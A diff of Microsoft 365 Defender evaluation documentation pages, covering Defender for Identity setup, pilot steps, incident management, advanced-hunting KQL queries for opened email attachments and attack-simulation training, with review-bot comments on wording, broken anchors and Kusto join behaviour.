+This article is [Step 2 of 2](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Use the following steps to set up your Microsoft Defender for Identity environment.
+
+![Steps to enable Microsoft Defender for Identity in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-identity-eval-enable-steps.png)
+
+- [Step 1. Set up the Defender for Identity Instance](#step-1-set-up-the-defender-for-identity-instance)
+- [Step 2. Install and configure the sensor](#step-2-install-and-configure-the-sensor)
+- [Step 3. Configure event log and proxy settings on machines with the sensor](#step-3-configure-event-log-and-proxy-settings-on-machines-with-the-sensor)
+- [Step 4. Allow Defender for Identity to identify local admins on other computers](#step-4-allow-defender-for-identity-to-identify-local-admins-on-other-computers)
+
+## Step 1. Set up the Defender for Identity Instance
+
+Sign in to the Defender for Identity portal to create your instance and then connect this instance to your Active Directory environment.
+
+| |Step |More information |
+||||
+|1 | Create the Defender for Identity instance | [Quickstart: Create your Microsoft Defender for Identity instance](/defender-for-identity/install-step1) |
+|2 | Connect the Defender for Identity instance to your Active Directory forest | [Quickstart: Connect to your Active Directory Forest](/defender-for-identity/install-step2) |
+| | |
+
+## Step 2. Install and configure the sensor
+
+Next, download, install, and configure the Defender for Identity sensor on the domain controllers and AD FS servers in your on-premises environment.
+
+| |Step |More information |
+||||
+|1 | Determine how many Microsoft Defender for Identity sensors you need. | [Plan capacity for Microsoft Defender for Identity](/defender-for-identity/capacity-planning) |
+|2 | Download the sensor setup package | [Quickstart: Download the Microsoft Defender for Identity sensor setup package](/defender-for-identity/install-step3) |
+|3 | Install the Defender for Identity sensor | [Quickstart: Install the Microsoft Defender for Identity sensor](/defender-for-identity/install-step4) |
+|4 | Configure the sensor | [Configure Microsoft Defender for Identity sensor settings ](/defender-for-identity/install-step5) |
+| | | |
+
+## Step 3. Configure event log and proxy settings on machines with the sensor
+
+On the machines that you installed the sensor on, configure Windows event log collection and Internet proxy settings to enable and enhance detection capabilities.
+
+| |Step |More information |
+||||
+|1 | Configure Windows event log collection | [Configure Windows Event collection](/defender-for-identity/configure-windows-event-collection) |
+|2 | Configure Internet proxy settings | [Configure endpoint proxy and Internet connectivity settings for your Microsoft Defender for Identity Sensor](/defender-for-identity/configure-proxy) |
+| | | |
+
+## Step 4. Allow Defender for Identity to identify local admins on other computers
+
+Microsoft Defender for Identity lateral movement path detection relies on queries that identify local admins on specific machines. These queries are performed with the SAM-R protocol, using the Defender for Identity Service account.
+
+To ensure Windows clients and servers allow your Defender for Identity account to perform SAM-R, a modification to Group Policy must be made to add the Defender for Identity service account in addition to the configured accounts listed in the Network access policy. Make sure to apply group policies to all computers **except domain controllers**.
+
+For instructions on how to do this, see [Configure Microsoft Defender for Identity to make remote calls to SAM](/defender-for-identity/install-step8-samr).
+
+## Next steps
+
+Step 3 of 3: [Pilot Microsoft Defender for Identity](eval-defender-identity-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
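Review bot: the step numbering is inconsistent: the intro says "This article is [Step 2 of 2]" but the Next steps section continues with "Step 3 of 3: Pilot Microsoft Defender for Identity", and the overview and architecture articles in this change describe a three-step process, so this should read "Step 2 of 3". In the Step 1 table, the trailing row `| | |` has two cells in a three-column table (the other tables use `| | | |`); drop these empty trailing rows entirely since they render as blank rows. In Step 4, "the Network access policy" is vague; the Group Policy setting involved is "Network access: Restrict clients allowed to make remote calls to SAM", and naming it would make the instruction to add the service account alongside the already configured accounts unambiguous, and the warning to exclude domain controllers easier to apply. Also keep capitalization consistent: "Defender for Identity Service account" in one paragraph versus "Defender for Identity service account" in the next.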
security Eval Defender Identity Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-overview.md
+
+ Title: Evaluate Microsoft 365 Defender for Identity overview, set up evaluation, eval and pilot
+description: Steps for the evaluation of Microsoft 365 Defender for Identity including requirements, enabling or activating the eval, and set up of the pilot or test.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Defender for Identity overview
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to enable and pilot Microsoft Defender for Identity. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Identity.
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-identity-eval-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Review architecture requirements and key concepts](eval-defender-identity-architecture.md) | Understand the Defender for Identity architecture and be sure your environment meets the architecture prerequisites. |
+|2|[Enable the evaluation environment](eval-defender-identity-enable-eval.md) | Follow the steps to set up the evaluation environment. |
+|3|[Set up the pilot](eval-defender-identity-pilot.md) | Learn about benchmark settings for your identity environment and try out Defender for Identity tutorials. |
+||||
+
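Review bot: the front-matter title and description call the product "Microsoft 365 Defender for Identity" while the H1 and body use the correct name "Microsoft Defender for Identity"; align the metadata with the body. The step table ends with an empty `||||` row that renders as a blank line and should be removed. The Step 3 description, "Learn about benchmark settings for your identity environment", would be clearer as "Configure benchmark recommendations for your identity environment", matching the Step 1 heading of the pilot article it links to.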
security Eval Defender Identity Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-pilot.md
+
+ Title: Pilot Microsoft Defender for Identity, set up configuration benchmarks, standards, guidelines, and take tutorials about detecting, and remediating various Identity threats like reconnaissance, compromised credential, lateral movement, domain dominance, and exfiltration alerts, conduct user, computer, entity, and lateral movement paths investigation.
+description: Pilot Microsoft Defender for Identity, set benchmarks, take tutorials on reconnaissance, compromised credential, lateral movement, domain dominance, and exfiltration alerts, among others.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Identity
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for identity. Note that the recommendations don't include setting up a pilot group. The best practice is to go ahead and install the sensor on all of your servers running Active Directory Domain Services (AD DS) and Active Directory Federated Services (AD FS).
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-identity-pilot-steps.png)
+
+The following table describes the steps in the illustration.
+
+- [Step 1: Configure benchmark recommendations for your identity environment](#step-1-configure-benchmark-recommendations-for-your-identity-environment)
+- [Step 2: Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types ](#step-2-try-out-capabilities--walk-through-tutorials-for-identifying-and-remediating-different-attack-types)
+
+## Step 1. Configure benchmark recommendations for your identity environment
+
+Microsoft provides security benchmark recommendations for customers using Microsoft Cloud services. The [Azure Security Benchmark](/security/benchmark/azure/overview) (ASB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure.
+
+These benchmark recommendations include [Azure security baseline for Microsoft Defender for Identity](/security/benchmark/azure/baselines/defender-for-identity-security-baseline). Implementing these recommendations can take some time to plan and implement. While these will greatly increase the security of your identity environment, they shouldn't prevent you from continuing to evaluate and implement Microsoft Defender for Identity. These are provided here for your awareness.
+
+## Step 2. Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types
+
+The Microsoft Defender for Identity documentation includes a series of tutorials that walk through the process of identifying and remediating various attack types.
+
+Try out Defender for Identity tutorials:
+- [Reconnaissance alerts](/defender-for-identity/reconnaissance-alerts)
+- [Compromised credential alerts](/defender-for-identity/compromised-credentials-alerts)
+- [Lateral movement alerts](/defender-for-identity/lateral-movement-alerts)
+- [Domain dominance alerts](/defender-for-identity/domain-dominance-alerts)
+- [Exfiltration alerts](/defender-for-identity/exfiltration-alerts)
+- [Investigate a user](/defender-for-identity/investigate-a-user)
+- [Investigate a computer](/defender-for-identity/investigate-a-computer)
+- [Investigate lateral movement paths](/defender-for-identity/investigate-lateral-movement-path)
+- [Investigate entities](/defender-for-identity/investigate-entity)
+
+## Next steps
+
+[Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
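Review bot: the em dash in the Step 2 heading and its link is mis-encoded as `ΓÇö` in both "Step 2: Try out capabilities ΓÇö Walk through tutorials" and "## Step 2. Try out capabilities ΓÇö Walk through tutorials", and the anchor `#step-2-try-out-capabilities--walk-through-...` was generated from that dash, so the in-page link will break as soon as the heading is fixed; replace the mojibake with a plain dash or colon in both places and regenerate the anchor. The intro also says "The following table describes the steps in the illustration" but what follows is a bullet list, and the list uses "Step 1:" while the headings use "Step 1.". In Next steps, "Return to the overview for [Evaluate Microsoft Defender for Office 365]" should point at `eval-defender-identity-overview.md`, as the other Identity articles in this change do. Wording: "Microsoft Defender for identity" needs a capital I, "setup and configure" should be "set up", and "Active Directory Federated Services" should be "Active Directory Federation Services" as in the architecture article.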
security Eval Defender Investigate Respond Additional https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-additional.md
+
+ Title: Try Microsoft 365 Defender incident response capabilities in a pilot environment, to prioritize and manage incidents, configure automated investigation and response, and use advanced hunting
+description: Try incident response capabilities in Microsoft 365 Defender to prioritize and manage incidents, automate investigations, and use advanced hunting in threat detection.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
++ Last updated : 07/09/2021+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Try Microsoft 365 Defender incident response capabilities in a pilot environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 2 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft 365 Defender using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
+
+Once you have performed an [incident response for a simulated attack](eval-defender-investigate-respond-simulate-attack.md), here are some Microsoft 365 Defender capabilities to explore:
+
+|Capability |Description |
+|:-|:--|
+| [Prioritize incidents](#prioritize-incidents) | Use filtering and sorting of the incidents queue to determine which incidents to address next. |
+| [Manage incidents](#manage-incidents) | Modify incident properties to ensure correct assignment, add tags and comments, and to resolve an incident. |
+| [Automated investigation and response](#examine-automated-investigation-and-response-with-the-action-center) | Automated investigation and response (AIR) capabilities that can help your security operations team address threats more efficiently and effectively. The Action center is a "single pane of glass" experience for incident and alert tasks such as approving pending remediation actions. |
+| [Advanced hunting](#advanced-hunting) | A query-based threat-hunting tool that lets you proactively inspect events in your network and locate threat indicators and entities. You also use advanced hunting during the investigation and remediation of an incident. |
+||||
+
+## Prioritize incidents
+
+You get to the incident queue from **Incidents & alerts > Incidents** on the quick launch of the Microsoft 365 Defender portal ([security.microsoft.com](https://security.microsoft.com)). Here's an example.
++
+The **Most recent incidents and alerts** section shows a graph of the number of alerts received and incidents created in the last 24 hours.
+
+To examine the list of incidents and prioritize their importance for assignment and investigation, you can:
+
+- Configure customizable columns (select **Choose columns**) to give you visibility into different characteristics of the incident or the impacted entities. This helps you make an informed decision regarding the prioritization of incidents for analysis.
+
+- Use filtering to focus on a specific scenario or threat. Applying filters on the incident queue can help determine which incidents require immediate attention.
+
+From the default incident queue, select **Filters** to see a **Filters** pane, from which you can specify a specific set of incidents. Here is an example.
++
+For more information, see [Prioritize incidents](incident-queue.md).
+
+## Manage incidents
+
+You can manage incidents from the **Manage incident** pane for an incident. Here's an example.
++
+You can display this pane from the **Manage incident** link on the:
+
+- Properties pane of an incident in the incident queue.
+- **Summary** page of an incident.
+
+Here are the ways you can manage your incidents:
+
+- Edit the incident name
+
+ Change the utomatically assigned name based on your security team best practices.
+
+- Add incident tags
+
+ Add tags that your security team uses to classify incidents, which can be later filtered.
+
+- Assign the incident to yourself
+
+ Assign it to your user account name, which can be later filtered.
+
+- Resolve an incident
+
+ Close the incident after it has been remediated.
+
+- Set its classification and determination
+
+ Classify and select the threat type when you resolve an incident.
+
+- Add comments
+
+ Use comments for progress, notes, or other information based on your security team best practices. The full comment history is available from the **Comments and history** option in the details page of an incident.
+
+For more information, see [Manage incidents](manage-incidents.md).
+
+## Examine automated investigation and response with the Action center
+
+Depending on how automated investigation and response capabilities are configured for your organization, remediation actions are taken automatically or only upon approval by your security operations team. All actions, whether pending or completed, are listed in the [Action center](m365d-action-center.md), which lists pending and completed remediation actions for your devices, email & collaboration content, and identities in one location.
+
+Here's an example.
++
+From the Action center, you can select pending actions and then approve or reject them in the flyout pane. Here's an example.
++
+Approve (or reject) pending actions as soon as possible so that your automated investigations can proceed and complete in a timely manner.
+
+For more information, see [Automated investigation and response](m365d-autoir.md) and [Action center](m365d-action-center.md).
+
+## Advanced hunting
+
+> [!NOTE]
+> Before we walk you through the advanced hunting simulation, watch the following video to understand advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations.
+
+<br>
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
++
+If the [optional fileless PowerShell attack simulation](eval-defender-investigate-respond-simulate-attack.md#simulate-an-attack-with-an-isolated-domain-controller-and-client-device-optional) were a real attack that had already reached the credential access stage, you can use advanced hunting at any point in the investigation to proactively search through events and records in the network using what you already know from the generated alerts and affected entities. For instance, you can query for any connections to the external IP address in the past 30 days.
+
+### Hunting environment requirements
+
+There's a single internal mailbox and device required for this simulation. You'll also need an external email account to send the test message.
+
+1. Verify that your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
+2. Identify a target mailbox to be used for receiving email.
+
+ - This mailbox must be monitored by Microsoft Defender for Office 365
+
+ - The device from requirement 3 needs to access this mailbox
+
+3. Configure a test device:
+
+ a. Make sure you are using Windows 10 version 1903 or later version.
+
+ b. Join the test device to the test domain.
+
+ c. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+
+ d. [Onboard to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+### Run the simulation
+
+1. From an external email account, send an email to the mailbox identified in step 2 of the hunting environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or an Office document type such as a Word file.
+
+2. Open the sent email from the device configured as defined in step 3 of the hunting environment requirements section. Either open the attachment or save the file to the device.
+
+#### Go hunting
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Hunting > Advanced hunting**.
+
+3. Build a query that starts by gathering email events.
+
+ 1. Select **Query > New**.
+
+ 1. In the **Email** groups under **Advanced hunting**, double-click **EmailEvents**. You should see this in the query window.
+
+ ```console
+ EmailEvents
+ ```
+
+ 1. Change the time frame of the query to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame as needed.
+
+ 1. Select **Run query**. You may have differing results depending on your pilot environment.
+
+ > [!NOTE]
+ > See the next step for filtering options to limit data return.
+
+ ![Example of the advanced hunting query results](../../media/mtp/fig19.png)
+
+ > [!NOTE]
+ > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
+
+ 1. Look at the results and see if you can identify the email you opened. It may take up to two hours for the message to show up in advanced hunting. To narrow down the results, you can add the **where** condition to your query to only look for emails that have "yahoo.com" as their SenderMailFromDomain. Here is an example.
+
+ ```console
+ EmailEvents
+ | where SenderMailFromDomain == "yahoo.com"
+ ```
+
+ 1. Click the resulting rows from the query so you can inspect the record.
+
+ ![Example of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
+
+4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this simulation, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
+
+ The following query will show you the result with a shorter list than your initial query for all email events:
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ ```
+
+5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
+
+ The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ ```
+
+6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
+
+ The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ ```
+
+ You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+
+7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ | distinct SHA1
+ | invoke FileProfile()
+ ```
+
+#### Create a detection
+
+Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
+
+Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
+
+1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
+
+ ![Example of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
+
+ > [!NOTE]
+ > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
+
+2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
+
+ ![Example of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
+
+ Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
+
+3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
+
+ ![Example of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
+
+4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
+
+ ![Example of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
+
+5. Select the scope for the alert rule. Since this query involves devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
+
+ ![Example of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
+
+ For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
+
+6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
+
+ ![Example of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
+
+ ![Example of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
+
+ From this page, you can select the detection rule, which will open a details page.
+
+ ![Example of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
+
+<!--
+
+### Advanced hunting walk-through exercises
+
+To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities, and create custom detections and remediation actions.
+
+> [!NOTE]
+> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
+
+|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
+||||||
+|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
+|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
+|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
+|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
+|
+
+-->
+
+### Expert training on advanced hunting
+
+**Tracking the adversary** is a webcast series for new security analysts and seasoned threat hunters. It guides you through the basics of advanced hunting all the way to creating your own sophisticated queries.
+
+See [Get expert training on advanced hunting](advanced-hunting-expert-training.md) to get started.
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
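Review bot: the queries in steps 5 through 7 of "Go hunting" rely on Kusto's default join kind, `innerunique`, which deduplicates the left-hand table on the join key before matching, so `| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId` and `| join DeviceFileEvents on SHA256` can silently drop rows when the same attachment hash arrives in several messages or the same message is delivered to several recipients. Suggest `| join kind=inner` for both joins, plus a `| where isnotempty(SHA256)` guard before the second one so attachments with no recorded hash cannot match file events. Related: the "Create a detection" step turns this query into a custom detection rule, which keys alerts on the `Timestamp` and `ReportId` columns, but after two joins the unsuffixed `Timestamp` that survives comes from EmailAttachmentInfo while `ReportId` comes from EmailEvents, and the DeviceFileEvents copies get numeric suffixes; the text should tell the reader to finish with an explicit `project` that takes both columns from a single event (for example the DeviceFileEvents record) before clicking Create detection rule. Style point: the KQL blocks are fenced as `console`; `kusto` would give correct highlighting.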
security Eval Defender Investigate Respond Simulate Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-simulate-attack.md
+
+ Title: Run an attack simulation in a Microsoft 365 Defender pilot environment, isolated environment for attack simulation, response, remediation
+description: Run attack simulations for Microsoft 365 Defender to see how how alerts and incidents are presented, insights are gained, and threats are quickly remediated.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-scenario
+ - m365solution-pilotmtpproject
+
+ms.technology: m365d
++
+# Run an attack simulation in a Microsoft 365 Defender pilot environment
++
+This article is [Step 1 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft 365 Defender using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
+
+After preparing your [pilot environment](eval-defender-investigate-respond.md), it's time to test Microsoft 365 Defender's incident response and automated investigation and remediation capabilities by creating an incident with a simulated attack and using the Microsoft 365 Defender portal to investigate and respond.
+
+An incident in Microsoft 365 Defender is a collection of correlated alerts and associated data that make up the story of an attack.
+
+Microsoft 365 services and apps create alerts when they detect a suspicious or malicious event or activity. Individual alerts provide valuable clues about a completed or ongoing attack. However, attacks typically employ various techniques against different types of entities, such as devices, users, and mailboxes. The result is multiple alerts for multiple entities in your tenant.
+
+>[!Note]
+>If you are brand new to security analysis and incident response, see the [Respond to your first incident walkthrough](first-incident-overview.md) to get a guided tour of a typical process of analysis, remediation, and post-incident review.
+>
+
+## Simulate attacks with the Microsoft 365 Defender portal
+
+The Microsoft 365 Defender portal has built-in capabilities to create simulated attacks on your pilot environment:
+
+- Attack simulation training for Microsoft 365 Defender for Office 365 at [https://security.microsoft.com/attacksimulator](https://security.microsoft.com/attacksimulator).
+
+ In the Microsoft 365 Defender portal, select **Email & collaboration > Attack simulation training**.
+
+- Attack tutorials & simulations for Microsoft 365 Defender for Endpoints at [https://security.microsoft.com/tutorials/simulations](https://security.microsoft.com/tutorials/simulations).
+
+ In the Microsoft 365 Defender portal, select **Endpoints > Tutorials & simulations**.
+
+### Defender for Office 365 Attack simulation training
+
+Defender for Office 365 with Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 includes attack simulation training for phishing attacks. The basic steps are:
+
+1. Create a simulation
+
+ For step by step instructions on how to create and send a new simulation, see [Simulate a phishing attack](/microsoft-365/security/office-365-security/attack-simulation-training).
+
+2. Create a payload
+
+ For step by step instructions on how to create a payload for use within a simulation, see [Create a custom payload for Attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-payloads).
+
+3. Gaining insights
+
+ For step by step instructions on how to gain insights with reporting, see [Gain insights through Attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-insights).
+
+For more information, see [Simulations](/microsoft-365/security/office-365-security/attack-simulation-training-get-started#simulations).
+
+### Defender for Endpoint attack tutorials & simulations
+
+Here are the Defender for Endpoint simulations from Microsoft:
+
+- Document drops backdoor
+- Automated investigation (backdoor)
+
+There are additional simulations from Attack IQ and SafeBreach. There are also a set of tutorials.
+
+For each simulation or tutorial:
+
+1. Download and read the corresponding walk through document provided with your selected simulation or scenario.
+
+2. Download the simulation file. You can choose to download the file or script on the test device but it's not mandatory.
+
+3. Run the simulation file or script on the test device as instructed in the walk through document.
+
+ For more information, see [Experience Microsoft Defender for Endpoint through simulated attack](/microsoft-365/security/defender-endpoint/attack-simulations).
+
+## Simulate an attack with an isolated domain controller and client device (optional)
+
+In this optional incident response exercise, you'll simulate an attack on an isolated Active Directory Domain Services (AD DS) domain controller and Windows 10 device using a PowerShell script and then investigate, remediate, and resolve the incident.
+
+First, you need to add endpoints to your pilot environment.
+
+### Add pilot environment endpoints
+
+First, you need to add an isolated AD DS domain controller and a Windows 10 device to your pilot environment.
+
+1. Verify your pilot environment tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
+
+2. Verify that your domain controller:
+
+ - Runs Windows Server 2008 R2 or a later version.
+ - Reports to [Microsoft Defender for Identity](/azure/security-center/security-center-wdatp) and has enabled [remote management](/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
+ - Has [Microsoft Defender for Identity and Microsoft Cloud App Security integration](/cloud-app-security/mdi-integration) enabled.
+ - Has a test user is created in the test domain. Administrator-level permissions are not needed.
+
+3. Verify that your test device:
+
+ - Runs Windows 10 version 1903 or a later version.
+ - Is joined to the AD DS domain controller domain.
